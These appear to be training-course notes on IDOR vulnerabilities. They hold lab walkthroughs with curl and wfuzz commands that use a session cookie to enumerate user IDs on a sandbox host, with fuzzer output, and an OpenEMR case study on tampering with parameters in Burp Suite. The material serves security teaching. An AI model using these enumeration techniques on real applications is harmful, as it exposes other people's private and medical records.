Module 15: Insecure Direct Object Referencing

Introduction to IDOR

Static File IDOR

Static File IDOR Landing Page

Sample routing

/users/:userIdent/documents/:pdfFile
/trains/:from-:to
/book/:year-:author

Routed URI Examples

/users/18293017/documents/file-15 (PDF Retrieved)
/trains/LVIV-ODESSA               (Ticket File Retrieved)
/book/1996-GeorgeRRMartin         (Book Retrieved)

Database Object Referencing (ID-Based) IDOR

Example IDOR for a Database Object

http://idor-sandbox:80/customerPage/?custId=1

Exploiting IDOR in the Sandbox

Accessing the IDOR Sandbox Application

Start the VPN, the VM, and add its IP and hostname to your hosts file.

Exploiting Static File IDOR

Click "File-Based IDOR"
File-Based IDOR URI
Contents of the file
Setting ?f=2.txt

Exploiting ID-Based IDOR

ID-Based IDOR
The /customerPage/?custId= URI
The Rendered Content
Incrementing the custId Database Parameter by one

Because we retrieved information through the web browser for a separate user entirely that corresponds with a Customer ID value of "2", we can guess this was the second registered user for the web application.

Exploiting More Complex IDOR

Logging in as User Harb
Harb's Data

Gathering Erroneous Response Sizes

kali@kali:~$ curl -s http://idor-sandbox:80/user/?uid=62718 -w '%{size_download}'
0

We got 0 because we didn't include a valid session ID.

Gathering a valid session ID

Gathering Erroneous Response Sizes with a Session ID

kali@kali:~$ curl -s /dev/null http://idor-sandbox:80/user/?uid=91191 -w '%{size_download}' --header "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"
...
2873

Fuzzing 100,000 possible UIDs

kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt --hc 404 --hh 2873 -H "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64" http://idor-sandbox:80/user/?uid=FUZZ

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://idor-sandbox:80/user/?uid=FUZZ
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000011112:   200        76 L     174 W      2859 Ch     "11111"
000016328:   200        76 L     174 W      2860 Ch     "16327"
000023102:   200        76 L     174 W      2874 Ch     "23101"
000039202:   200        76 L     174 W      2867 Ch     "39201"
000041913:   200        76 L     174 W      2861 Ch     "41912"
000057192:   200        76 L     174 W      2863 Ch     "57191"
000062719:   200        76 L     174 W      2871 Ch     "62718"
000074833:   200        76 L     175 W      2868 Ch     "74832"
000083272:   200        76 L     174 W      2858 Ch     "83271"
000099181:   200        76 L     174 W      2866 Ch     "99180"

Total time: 755.6711
Processed Requests: 100000
Filtered Requests: 99990
Requests/sec.: 132.3327
Exfiltrated Data

Extra Miles

Do the labs.

Case Study: OpenEMR

Accessing The OpenEMR Case Study

Start the VPN, the VM, and add the IP/hostname to your hosts file.

Discovery of the IDOR Vulnerability

OpenEMR Landing Page
Login form
Dashboard Panel for OpenEMR
Message Center - Tab
Message Center - Tab Content
Individual Patient Messages
Turning on Burp Suite's Intercept Feature
Clicking Print message
Intercepted Request in Burp Suite
Request in Repeater

Exploiting the IDOR Vulnerability

Exfiltrated Data for Parameter Value of 11
Trying again with a value of 10

Extra Mile

Do the lab.

PreviousModule 14: Server-side Request ForgeryNextModule 16: Assembling the Pieces: Web Application Assessment Breakdown

Last updated